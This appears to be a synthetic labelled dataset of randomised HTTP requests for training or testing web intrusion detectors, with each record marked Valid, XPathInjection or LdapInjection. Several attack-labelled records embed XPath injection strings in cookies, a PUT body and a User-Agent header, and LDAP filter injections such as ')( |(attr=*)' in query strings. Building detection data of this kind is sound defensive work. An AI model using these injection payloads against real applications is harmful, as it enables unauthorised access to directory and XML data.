If-Match: "m@-iZ-1LItUrOkBjW"
If-None-Match: "5MchhWgcCDadiIy"
If-Range: *
Max-Forwards: 91
MIME-Version: 0.1
Pragma: 7Hs=fnMctau
Proxy-Authorization: Basic QWVlOGFzRTpENm9lb3p0
Authorization: Digest realm
Range: 014236-,328751-67,-519123
Referer: http://www.bg4a.ch/3tr5ihnn.asp
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: aJk0dfWRz http://www.fnluio0e.fr
UA-CPU: PowerPC
UA-Disp: 1652,237,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2347x669
Via: Nctg/8.6 www.mtfi.tiff
Transfer-Encoding: p9wih; hbNsh8D=rg4wEanB
Upgrade: ety/4.8
Warning: 729 222.217.184.32 "Seioo3tr0ha" "Sun, 22 Jul 07 15:10:27 GMT"
X-Forwarded-For: 214.165.29.201
X-Serial-Number: 28910349808
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14621
Start - Id: 3434
class: Valid
GET /iws77x/xH/ahxoedAneabki.php4?6e=79qf++UfromsLA&tieuL262m=astyz HTTP/1.0
Host: www.makdoelx.org
Connection: keep-alive
Accept: application/*, text/*;q=0.8
Accept-Charset: koi8-r;q=0.1, iso-2022-jp;q=0.5
Accept-Encoding: 
Accept-Language: ttel-0;q=0.3, ecsH-qwYongL, a-2;q=0.9, H-uni, seioovr-e
Cache-Control: no-cache
Client-ip: 120.58.88.240
Cookie: ctarAoxu=7056589;Iilloh=55608
Cookie2: $Version="644"
Date: Mon, 20 Oct 08 15:15:45 UTC
ETag: W/"-ux1L@tJgN0cXsjizl_"
Expect: sstme=eTehehs;lsJr=etacnI
From: otEj@3satd.de
If-Modified-Since: Sun, 25 Oct 09 05:58:58 UTC
If-Unmodified-Since: Tue, 23 Sep 08 22:39:21 CET
If-Match: "P9v6n-qBZRyBphDI.Fed"
If-None-Match: "fa-hvVmvDWkgAeS-xYTO"
If-Range: Sat, 08 Mar 08 09:37:40 CET
Max-Forwards: 00
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: oelm rVeossvy=Pglhhhii
Authorization: Digest opaque="0sts"
Range: -79,44302-,67-20461
Referer: /8evo/ltmuh/ntoos.wav
TE: trailers
Trailer: Date
User-Agent: Rpuc/1.7.5.2.3
UA-CPU: MIPS
UA-Disp: 408,7586,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 969x7653
Via: HTTP/5.8 www.Lo5eRl.jpg, HTTP/6.5 www.shIhenir.css, 8.5 203.149.62.120
Transfer-Encoding: kevi; hsen=nmznei
Upgrade: kwoamn/0.4, abisi/5.9, e4spdc/6.8, najt/2.6, ascte/4.1
Warning: 682 122.84.45.120 "hiq8gwIlahfmhHa" 
X-Forwarded-For: 60.74.245.251
X-Serial-Number: 80963840971
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3434
Start - Id: 48474
class: XPathInjection
GET /hM27xlikelibQ/oMQq6dQfQYq3UN/nYSSj/cl.W4/bgsoundfN/Stoueicgneu/zG@oA/tC8L/exbLKzGE9lut0y.vb11/bhthsBtA/ls-FS-kw_uwbbHCnaKgR/BFj_.htm?qrNi-s@systemetc=838695757&linkVQUe.o3=0&ynniaeiO=rn%3Eeatfdfoissaaass2o&vrctor=qr%27tetdsock_streamdsr%25&iAthnj8tl=8898168244&3es0tehyifnm=PallarnmthArxywgetLtni&7rtzv8mhtha=eallehuhSkaana9&b5e=038&iwy=ue&SEz8@IGscriptJdg=echocr&s9qvdriIDtchAd=01953815&DOm3Sng8eokk=159 HTTP/1.1
Host: 187.164.186.87
Connection: keep-alive
Accept: application/x-tar
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: no-store
Client-ip: 198.49.180.17
Cookie: childPb9-d=606777;7ulbetSonrerb=sjEharpc;eoa=u5ieaw'    or  count( path/child::node()[position(  )=((    i  + j +k    +    l   +    1)]    |    path/child::*()[position()=(k+1)])=1    or  'thiiiTto'  =   '   pNi'   or;gzedtaaot=m;teeR4ift9tt=mBjmQq@iYQY
Cookie2: $Version="03"
Date: Sat, 21 Nov 09 15:07:28 CET
ETag: "Z_5r43Aedc8mg3lVUkM"
Expect: 100-continue
If-Modified-Since: Wed, 28 Dec 05 11:58:29 GMT
If-Unmodified-Since: Tue, 09 Feb 10 19:40:07 CET
If-Match: "cUkyR0DdeCyHTep6nOJ7"
If-None-Match: "yS480kxjswMuU@_W"
If-Range: Wed, 18 May 05 22:56:19 GMT
Max-Forwards: 819
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Digest response="3ecaA3DA260cb9A81E7121fefD40e878"
Authorization: Digest nc=3d213E2c
Range: -7206,3-30956,-92506
Referer: /rtJheeq/neultL/elielet/f0yUa/haib.php
Trailer: Host
User-Agent: ij9mepaErastLwecdpe
UA-Disp: 6391,630,16
UA-Color: color8
Via: 1.7 8.10.114.86, 1.1 www.atso.css, 0.1 11.162.177.51
Transfer-Encoding: deflate
Warning: 970 www.loschtan.shtml:1 "dISrElrc" "Sat, 01 Dec 07 05:56:12 GMT"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48474
Start - Id: 11645
class: Valid
GET /13@mC1nlbXRE/koao78kgmztirtoiv.php?BamzBWGXoexecf=ppuiYach&tehht7lo9d0n=t&adldh4t=iAti&tqveo=%3BrA&iul=mcmYn&oer=Csi&ore1aafb4yFsst=iframevtei&aervtlhet=pe&Gn=6712146051&aSEauh=ee&HPKISPwGZx=%3Deu&eaiaim4brsbtyr=a%40F&evntgntOii1hyh=ln8wm&rnT=17&nhzbu2cdcosidn=pksi0e6EeiA%29Enr HTTP/1.1
Host: www.ltaotnib.uk
Connection: close
Accept: video/*;q=0.8, video/quicktime;q=0.9, image/*
Accept-Charset: iso-2022-jp;q=0.3, euc-cn, x-mac-ce, us-ascii;q=0.7, x-mac-greek
Accept-Encoding: deflate, deflate;q=0.8, identity;q=0.6, gzip;q=0.1, identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 37.192.196.13
Cookie: pcmo5ouqost5sz=279787;replacelVjC5null9pbgsoundZ=2Y@qCU;nighoadMito2eyb=2632;etn=244;fxwgetSHjS7Q8=bAi20pSmadi;ol=O5bt -mo]eeohlwinnt@tO
Cookie2: $Version="01"
Date: Mon, 06 Feb 06 03:17:54 CET
ETag: W/"RuresPYWF9PlPtUYTR"
Expect: xlnnaai=ef0oa
From: yspI@eunniwes.st
If-Modified-Since: Sun, 25 Mar 07 08:45:41 GMT
If-Unmodified-Since: Thu, 01 Oct 09 01:46:49 CET
If-Match: "HOmwNRND@LDs-3."
If-None-Match: *
If-Range: Sun, 10 Jan 10 12:17:38 CET
Max-Forwards: 0579
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: satdDc scyr=Rezb
Authorization: tgons ts1e=iawiekiv
Range: 5854-,364225-
Referer: /e5Ar/Ceiu.mdb
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/1.5 (compatible; MSIE 4.6; Windows NT; lleNa1s; n1re)
UA-CPU: PowerPC
UA-Disp: 3478,401,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 3585x2586
Via: felli/3.8 129.157.151.82:51, HTTP/4.0 www.h9hpsi.js:94, 9.9 www.brgsr.png
Transfer-Encoding: deflate
Upgrade: evr/0.8, eendoi/2.0, ahl/7.0, tirUw/6.8
Warning: 195 247.235.143.81 "t18osveN" 
X-Forwarded-For: 62.120.206.131
X-Serial-Number: 046539438868930
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11645
Start - Id: 35519
class: XPathInjection
PUT /iVTB/hW2fa6fEaR0e4tUaAoqf/lsnAemOoJax/oHdsaototailakt/sz4/29b.E/2a/G6ts/oeeloee5ohasi.cfm? HTTP/1.1
Content-Length: 401
Content-Language: 1itere,mnTR,sppmns7
Content-Encoding: identity
Content-MD5: dDRuYXJpbnRhb1ZzY3RvdQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sat, 27 Aug 05 17:48:46 CET
Host: 28.31.254.137:2014
Connection: keep-alive
Accept: image/png;q=0.6, text/html, video/mpeg;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: i='huqvnate'
Cookie2: $Version="1"
Date: Wed, 22 Aug 07 20:41:49 CET
Expect: 100-continue
If-Unmodified-Since: Sat, 12 May 07 16:49:45 CET
If-Match: "65vsifuT2uKvnZ-iUT"
If-None-Match: *
If-Range: Sat, 04 Feb 06 22:38:31 GMT
Max-Forwards: 7
Pragma: no-cache
Authorization: akeOn fdLzir=oeqt
Referer: /3aea/blhou7ke/soi5d/8ola2te.mp3
Trailer: Pragma
User-Agent: rerrhnoa/4.3.1
UA-Disp: 740,794,8
Transfer-Encoding: identity

drotdaoesr=voElml8I'  or     (i  <  count(ythhie/child::text())    and  j  < count(ed9o5/child::comment())     and     k <    count(Oe/child::*)    ) or 'psttdp' =   ' ue'  or&zCNdxq68oEG=nggem9esock_streamxlocationsytebdor&tRevloa=aa1updatenullom >B hHfh7a a&tteps=9&C9WdIbody=e4$u&SkC2p=EsOemchsboxe&tB=255983&HreyI=29311231&Biranaio=e

End - Id: 35519
Start - Id: 10466
class: Valid
GET /ne.html?eaiheogtwr9igm=bFE&jng=95362&trkwbolE=eadminhx6nrclnem&rrata3yttreh=trtEtqLG&0o=hi HTTP/1.0
Host: www.rpd0m.biz:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, identity, deflate, deflate
Accept-Language: *;q=0.1
Cache-Control: max-age=173
Client-ip: 223.0.87.89
Cookie: migihiaopegeaeb=556
Cookie2: $Version="443"
Date: Mon, 23 Oct 06 05:16:12 UTC
ETag: "o4hTUNKQt9lVw62b4Tjs"
Expect: 100-continue
From: adwhievh@07neTe5sO.uk
If-Modified-Since: Mon, 01 Jun 09 02:49:01 UTC
If-Unmodified-Since: Mon, 21 Jul 08 03:06:31 CET
If-Match: *
If-None-Match: "nP0vZX2UtAXBX69P0c"
If-Range: Wed, 04 Jan 06 06:41:26 GMT
Max-Forwards: 6034
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM c0lwRGFJb2x0bTNkdGVlRXJleTFwc2Zoc2VzbXZuN3IyeHRubA==
Authorization: Digest uri=/mzgnp72.cfm
Range: 5-1,96994-671,51284-
Referer: /8fats/cnmTwotg.css
TE: trailers,trailers,chunked;q=0.2
Trailer: Via
User-Agent: dNN3eoo (uehoAa; nET6YjG; rVKhIGx9s; hqO3J4)
UA-CPU: StrongARM
UA-Disp: 4910,021,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 747x1672
Via: harrat/3.4 243.136.85.64
Transfer-Encoding: deflate
Upgrade: ctah/6.6, Rtzei/0.4, fl4/6.0, eofhle/5.9, 7euoNe/5.2
Warning: 079 207.58.135.243:6637 "lldeeiya7z2nb" "Sat, 20 Mar 04 17:46:02 CET"
X-Forwarded-For: 153.53.63.108
X-Serial-Number: 23963701086419023023
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10466
Start - Id: 32733
class: Valid
PUT /rU/amdxljo7/4IA0d5Ig/tuHeku/eeaawe2aIail/lrit/oVM1/LkPAH.nsf? HTTP/1.1
Content-Length: 188
Content-Language: 4aouong,ae,t
Content-Encoding: gzip
Content-Location: http://hPbli.ch/ttluis/6tltis1g.mdb
Content-MD5: aWFhY3UyZXRhZWl3aTlhdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Apr 10 17:08:55 GMT
Last-Modified: Sat, 18 Apr 09 11:08:46 UTC
Host: www.alcndxiuda.biz
Connection: keep-alive
Accept: video/mpeg;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 103.216.102.1
Cookie: pbu=62039
Cookie2: $Version="7"
Date: Tue, 26 Aug 08 14:20:39 CET
ETag: "P4rYQxRGmRWfYPzbnT"
Expect: inEtim
From: eaop5a@jraia3l.uk
If-Modified-Since: Fri, 09 Jul 04 16:01:40 UTC
If-Unmodified-Since: Sun, 15 Mar 09 06:42:30 CET
If-Match: *
If-None-Match: *
If-Range: "EEuCfFUbeJCl.a.wNnP"
Max-Forwards: 2
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM bTR0ZWlyMnBpYW15ZXR0NWxlcGFoM2VpdDZzYTR1YWlyRXJvc25uaXQ=
Authorization: Digest nonce
Range: -41512,-04591,6-
Referer: http://www.emmF.it/lodca.avi
TE: gzip,deflate;q=0.0
Trailer: Max-Forwards
User-Agent: 7tnanv/7.5.0.6
UA-CPU: Sparc
UA-Disp: 2397,8345,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1032x4856
Via: e3s/6.2 216.37.220.202, 2.3 www.cfbnU.jpeg, 7.6 75.51.200.138
Transfer-Encoding: deflate
Upgrade: Ontms/2.9, ocVpad/2.0, t7o/2.5
Warning: 192 5.69.98.20 "aslrVau" 
X-Forwarded-For: 154.7.116.173
X-Serial-Number: 16114956793159
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

ryi8n= elib Naaowinntel;a\&7gs7TxmuombkUt=iaotiuoh9&an=0182220&Deelcc2le=6002&rndhnEt=52810&sf=726&l2bf=6sr&en=2550381910&rK=3961075&El=du&beerauspl=rU21eE.ao&lnebaWvce2=cHf0eL5icsoTin

End - Id: 32733
Start - Id: 3293
class: Valid
GET /a@nKN_96nG.css?enclI=tSe+e&esvm=e&oese9fwettui=bbtk&08GlCFD=n&3oNmDtraarr=o&faiNOOerunRdoeS=2EmCRlaiso6Ols&d4ge=s1E HTTP/1.0
Host: www.odSu.de:80
Connection: eeott
Accept: */*;q=0.5
Accept-Charset: x-mac-arabic, cp-950
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=2037
Client-ip: 107.185.188.2
Cookie: erl3eyIdirW5=@ l;lhpahersVA=osuydo(:7O< C
Cookie2: $Version="34"
Date: Sat, 29 Jan 05 19:44:24 CET
ETag: W/"B6CYsOrycHzh8pC52VW"
Expect: 100-continue
From: ynnst@syowo.org
If-Modified-Since: Sat, 02 Feb 08 09:52:35 UTC
If-Unmodified-Since: Sat, 09 Oct 04 23:51:19 CET
If-Match: *
If-None-Match: "WFnBzctg8r4GynAQw8Cw"
If-Range: "uA7XFRsxe-v@uczo3Un"
Max-Forwards: 166
MIME-Version: 6.5
Pragma: nt='IHheleB'
Proxy-Authorization: NTLM Y3R0ZGRTcmxiZW1iYWRhb0p0dHpuSHRvMDh2YXRmUXRVbw==
Authorization: Basic bGVyMGp3aTplb2puYQ==
Range: 715429-,64862-,731-870612
Referer: /uoebjnzi.wmn
TE: trailers
Trailer: From
User-Agent: Mozilla/7.7 (Windows; U; Win98 4.5; p3-sr; rv:4.2.8) Gecko/55602149
UA-CPU: PowerPC
UA-Disp: 6973,1860,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 179x3842
Via: HTTP/6.7 242.65.128.36, HTTP/7.5 www.10es6.jpeg
Transfer-Encoding: identity
Upgrade: bmdsep/9.4
Warning: 329 www.ims0.jpeg "mtefiw4rama7sn" 
X-Forwarded-For: 252.218.6.87
X-Serial-Number: 671477546416397721
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3293
Start - Id: 38959
class: LdapInjection
GET /b92TmH0lIU8nJ/tIW/dYSi/eijUca1tdr/tnTYl0igqgaovs/enpNi/hRTUprxAmwK/tpeDV4Wr1E5v/idsl/dafylausdiefi/7eayexd7iopsepoff.htm?k7s=lyuN%29%28+++%7C%287eseh%3D*%29 HTTP/1.1
Host: www.keitee.com
Connection: close
Accept: image/jpeg;q=0.3, text/*;q=0.1, image/*
Accept-Charset: us-ascii;q=0.7, x-mac-icelandic;q=0.7, x-mac-icelandic;q=0.3, ks_c_5601-1987
Accept-Encoding: *
Accept-Language: *
Cache-Control: le=e9haS
Client-ip: 69.146.201.136
Cookie: IKuqxsystem=rVtTZO
Cookie2: $Version="965"
Date: Wed, 03 Feb 10 01:01:54 CET
ETag: "Ggh2cDING6hjJg9V.o"
Expect: 100-continue
From: merdf@ssdhtag.cz
If-Modified-Since: Mon, 15 May 06 21:03:14 GMT
If-Unmodified-Since: Wed, 06 Jul 05 21:06:54 UTC
If-Match: *
If-None-Match: "9dX3hx96dfOrEM-zEyC"
If-Range: *
Max-Forwards: 2008
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="nisso"
Authorization: Basic Z2k4dDppc2Rzc2ZO
Range: -764,-7
Referer: /ttSUt83/ooreo/2etixNe/i1uhbse/urh0ysn.tiff
TE: deflate;q=0.2
Trailer: If-Match
User-Agent: Mozilla/0.5 (Windows; U; WinNT 0.5; cf-ns; rv:5.4.6) Gecko/75182769
UA-CPU: 68000
UA-Disp: 8492,4170,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 0621x5666
Via: FTP/0.3 www.dn70eu.htm, HTTP/9.8 www.eaesn.gif, FTP/2.7 www.ttne.js
Transfer-Encoding: compress
Upgrade: hnegB/7.8, nnade/5.0, ony/9.4
Warning: 338 www.dlne.html "onaaUtdMrofTts" "Sat, 20 Nov 04 10:50:52 GMT"
X-Forwarded-For: 97.3.123.50
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38959
Start - Id: 35890
class: XPathInjection
PUT /qUbJ.ls/3xrnizz/ipGTOJAgRW-/aK/3hT@-lf_uNeE.msf? HTTP/1.0
Content-Length: 23
Content-Language: 3hs,nth,eeama
Content-Encoding: deflate
Content-MD5: dGNzc0tlNmVwYWVhaXdhbA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 05 Oct 05 13:24:16 CET
Last-Modified: Mon, 30 Apr 07 14:28:55 UTC
Host: www.otUaaquyh.net
Connection: close
Accept: */*;q=0.7
Accept-Charset: windows-1257, windows-1257;q=0.0, x-mac-icelandic;q=0.6, us-ascii;q=0.3
Accept-Encoding: identity;q=0.0, compress
Accept-Language: sseoItt-n, hdT-sanh;q=0.7, 1dae-s, behboaJ-xmleUEi, liodihe-si
Cache-Control: gtj4eke=1iet
Date: Tue, 13 Sep 05 10:08:17 GMT
If-Modified-Since: Fri, 18 Jul 08 09:29:54 GMT
If-Unmodified-Since: Sat, 07 Aug 04 06:00:01 GMT
If-Match: "Ju9uXMl0mohFcAb"
If-Range: *
Authorization: Digest opaque="ohzeH3oh"
Range: -23690,93-568748,-273092
Referer: /mlcdn.js
User-Agent: (i    < count(8so0t/child::text())  and   j     < count(whi/child::comment()) and    k    < count(aeHtsc/child::*) )
Transfer-Encoding: aee9h; esoTWees=punSs3o
Upgrade: isre/2.5, fTav/7.2, rrvnwi/3.7, gsd/4.7
Warning: 657 191.154.129.185 "iulzyysenebtiTitMaMp" "Thu, 11 Jan 07 02:56:56 UTC"
X-Serial-Number: 503350081562336
----: -------------

weefasletoUhccT=hnodeer

End - Id: 35890
Start - Id: 22898
class: Valid
GET /Uxp_tKT-netcatv@lNk/i76IYbnL/WWAZdsi/hpm6senEfQ/C@xx0ggDCjykSHs/8sejMswatewt/eVE5F0zVXsOx@7/tT_pmDZc751UqO/lfogp/Gn3Kreplacevandjx/lycMd6P0RSZnUsyCQGo/ewdvirSa2.dll?didlauhrtLecms=uDYlZXfpVp&Eoegatdiiundl=609680&U_ed5tcopyW=75960598 HTTP/1.0
Host: www.fIOre.st
Connection: keep-alive
Accept: audio/basic;q=0.7, text/*, video/*
Accept-Charset: *
Accept-Encoding: deflate, identity
Accept-Language: ecAvhs-dhii6u
Cache-Control: no-store
Client-ip: 207.220.55.217
Cookie: axi=ee;gNwDfXclibaxp=evR7vyv_
Cookie2: $Version="6"
Date: Sat, 06 Jun 09 04:11:30 UTC
ETag: W/"QEsEF338pqT5DU2PSGk"
Expect: 100-continue
From: i3tdns@Gdxetisea.uk
If-Modified-Since: Tue, 28 Feb 06 09:09:54 UTC
If-Unmodified-Since: Sat, 08 Mar 08 06:40:23 UTC
If-Match: "EfY45aO6poCDhibFwj"
If-None-Match: *
If-Range: Wed, 26 Jul 06 08:45:48 CET
Max-Forwards: 8967
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest response="D5eE089E6EEFdcB7A2271Cf2fC0Fc032"
Authorization: Basic c21yZXRlOjdyZTk=
Range: -6039,4724-
Referer: http://www.cm5fvUh.net/rYyrnmg/oi84.jpg
TE: deflate,gzip
Trailer: Trailer
User-Agent: lea8asl (rI1l6gZ; 8uPQlU2p2g; s2KWlk; cvV71X)
UA-CPU: 68000
UA-Disp: 3881,209,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 301x6303
Via: 4.6 81.139.111.237, 7.9 www.mNmtarhy.tiff
Transfer-Encoding: deflate
Upgrade: aLdo/5.3, ih2/5.7
Warning: 383 www.enRF.jpeg "I3teed" 
X-Forwarded-For: 49.248.212.8
X-Serial-Number: 426023548
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22898
Start - Id: 23325
class: Valid
GET /hcEsyee5TyHwamoagei/9K.GOAlSY.GCbr1/zhFmoO/ee/ioszRv.tiff?rdfNyap6dhindje=aEDRSbdt&stlg3esoenezt=FimttmN&Pxp_0A@=001523&psesl7=nahgarc%29oean&servicesro-=87007684&eg=WQjg&_eHOU3Hk4Lyk=nl2anyn%27%7CiframeOdzft&nas=50227721&csrhedteyn=aehn4eeg1Nebs2 HTTP/1.1
Host: 80.169.168.234
Connection: 1a0aohT
Accept: image/*;q=0.5, text/plain, text/*
Accept-Charset: x-mac-korean, iso-8859-8;q=0.6
Accept-Encoding: compress;q=0.9, compress;q=0.7, compress, gzip, compress
Accept-Language: *
Cache-Control: max-stale=78978
Client-ip: 92.39.34.13
Cookie: ees=35;ahQAKJ=igetr;edib4=oar vxml0;6nerelha=n;nmailIHpMZ9V=a;45JPN5.OEd=i
Cookie2: $Version="186"
Date: Wed, 20 Jul 05 16:54:24 CET
ETag: W/"ynrqS@txFebq1J5v8"
Expect: 100-continue
From: nj1rhh3i@oh7torqhee.uk
If-Modified-Since: Thu, 15 May 08 19:19:00 GMT
If-Unmodified-Since: Wed, 17 Mar 10 03:50:03 CET
If-Match: *
If-None-Match: "hKQDb@EQWAHcc3Eo6JR"
If-Range: Sun, 07 May 06 14:09:35 GMT
Max-Forwards: 754
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: NTLM dTBjaEVvb3NzUm92c2Jvc2xvcW05UllvMWxpcG5hVGUwZWVuZHRkb3Ns
Authorization: Digest uri=/hbeyned/2frRo/tipxd4e/nntAe.nsf
Range: 56641-,-4,2-
Referer: http://iHteog2b.net/etae4c.gif
TE: deflate,trailers
Trailer: Proxy-Authorization
User-Agent: rlcTmr1e/1.6.4
UA-CPU: 68000
UA-Disp: 295,003,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 229x4077
Via: 0.1 68.222.62.88:4
Transfer-Encoding: aamat
Upgrade: eeer/9.5, ezn/0.2, eeM/5.1, hiAKQE/1.2
Warning: 614 www.eyqtEs.shtml "o4SsAiadTpu" "Mon, 26 Jul 04 10:18:10 GMT"
X-Forwarded-For: 93.28.77.128
X-Serial-Number: 22361064185048
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23325
Start - Id: 33875
class: Valid
PUT /remsT/Zi/sIdna6fsaynkrxxl/oinb4rrEb/cgrgIipllERiirsv/a@9Xj/Cm@kKA6/Bcpuo/9ith4ehnde/iyBpk/liaTFmsHBycEL.gif? HTTP/1.1
Content-Length: 57
Content-Language: ecZsn
Content-Encoding: compress
Content-Location: http://www.lUhfa.cz/7Eeg4eji/ooehm50/snidu/0At2sn/I9dr.msf
Content-MD5: M2VzZXdwdWlidW5pMWVlZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 Jan 04 02:11:26 CET
Last-Modified: Sun, 03 Jun 07 15:17:12 CET
Host: www.OHgmteltfd.fr
Connection: close
Accept: text/*, image/*;q=0.0, video/*;q=0.8
Accept-Charset: iso-8859-15;q=0.9, cp-950;q=0.5, windows-1252
Accept-Encoding: identity, deflate;q=0.7, compress;q=0.8, deflate;q=0.4
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 148.121.124.137
Cookie: iuhhlhxiS=2526;tArhrqE=pYyokZSXnoN
Cookie2: $Version="49"
Date: Fri, 22 Dec 06 17:46:46 CET
ETag: W/".FCW4_P@QuR9VtiA"
Expect: herbiiTL
From: croyb9et@hoshr.it
If-Modified-Since: Sun, 28 Dec 08 21:13:55 GMT
If-Unmodified-Since: Sat, 13 May 06 11:33:10 CET
If-Match: "p2l89-lm8gKtk4P1rZKG"
If-None-Match: *
If-Range: "ev6xp@7R_MD6tHVp1Y"
Max-Forwards: 64
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: NTLM ZXJvbGV6dHQ2aWhyaHR0bGUzZTVzZ2RpYmFzNXJpb2VodG5uMk8=
Authorization: NTLM anluZHR3MGpic3NzOXJOZWRxc2JwcWFpZWVsZUdpc2hlVFlpYWNuYW9pdGJrb2o5
Range: 10-81
Referer: /tGsnr/7nw9pi/logtawrn/stueh/mNaeo1.tiff
TE: deflate;q=0.4
Trailer: Range
User-Agent: sd0uscesaylr7niry
UA-CPU: x86
UA-Disp: 4768,0511,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 1982x002
Via: 5.3 www.rOt6.css
Transfer-Encoding: jiodf
Upgrade: 1heem/5.4, eot/5.0, kci2K/9.9, nTh/3.0
Warning: 386 www.tlil.htm "ne3vclsavetwrlareirf" 
X-Forwarded-For: 242.67.177.66
X-Serial-Number: 193442024633174
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

4C7HX=omseo&1hka2g=6RfvSr&wit1cIsill=2807&iot=reo%us1 n

End - Id: 33875
Start - Id: 49895
class: XPathInjection
GET /lrb@YLfidL.htm?HhlytnOaj=3&nred6RaOTV=82++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or++++11282%3D&tdNnme=7605&Evgos=a1vg4FyXJ&tbyhgsacei5=nnodertmphp&sbetweenpL=%2BnaoFoi%7ErbEeea+v%2F&onhvtTreq=verfilyrltacrTe&-lcnz=uxU6C&rhodh=3&Ealuatpye=pselect+hr%3Apositiondmn&to0ifalZo=fStsea+lgl&wLmAc9Ecopy=saefshNmyce HTTP/1.0
Host: 155.205.135.44
Connection: Odlousep
Accept: application/*, application/rtf
Accept-Charset: x-mac-chinesesimp, x-mac-chinesetrad;q=0.2, iso-8859-15;q=0.8, cp-950;q=0.8, windows-1253
Accept-Encoding: *;q=0.7
Accept-Language: at-msaR2;q=0.1, roanao-r;q=0.6
Cache-Control: max-age=79429
Client-ip: 30.98.150.84
Cookie: 2e=rigooklE;hpHcioe4t=jrcGo_;aexno3u2is=uns4bno;lp=6811;twsif=N
Cookie2: $Version="491"
Date: Mon, 27 Oct 08 10:19:19 UTC
ETag: W/"b-3HRHuMckDu@e-89"
Expect: 3ms1era
From: t9xyb@dtrmz.gov
If-Modified-Since: Wed, 04 Mar 09 04:33:06 CET
If-Unmodified-Since: Fri, 05 Aug 05 24:01:21 UTC
If-Match: *
If-None-Match: "Qh.rIkOM9jWL_2anXt3"
If-Range: Wed, 29 Mar 06 17:05:10 UTC
Max-Forwards: 13
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic YlA3RTlvOm5GYWE=
Range: 794-
Referer: http://www.a8na.com/cjev.swf
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/1.0 (Machintosh; U; PPC Mac OS X 8.5; yT-rg; rv:1.6.6) Gecko/41431445
UA-CPU: PowerPC
UA-Disp: 2831,824,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 9591x1965
Via: 8.8 www.iaaR.jpeg:18
Transfer-Encoding: gzip
Upgrade: Ez33h8/8.9, Odopt/6.7, aym/2.3, ttuho/1.9
Warning: 883 www.oeedEt.gif "90sw81n3tnalV" 
X-Forwarded-For: 49.36.115.120
X-Serial-Number: 87544886060
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49895
Start - Id: 38663
class: LdapInjection
GET /Jihtpass8edR@W.VcBw2/eEj9UmraG/c_L/iedXdp/Wo-tbgsound.y9/tkItOBUhJF2.js?formYLhr=2onsooreelr%3E&dAbchild=%29++%28+++%7C%28a9ri%3Does*%29&liph23tiaurern9=rghiUmX25Sk&r30=192&rsau2enmlhe=144 HTTP/1.0
Host: 138.145.17.245:80
Connection: close
Accept: video/mpeg;q=0.6, image/png;q=0.7
Accept-Charset: iso-2022-jp, hz-gb-2312;q=0.3, macintosh, isiri-3342, windows-1252;q=0.7
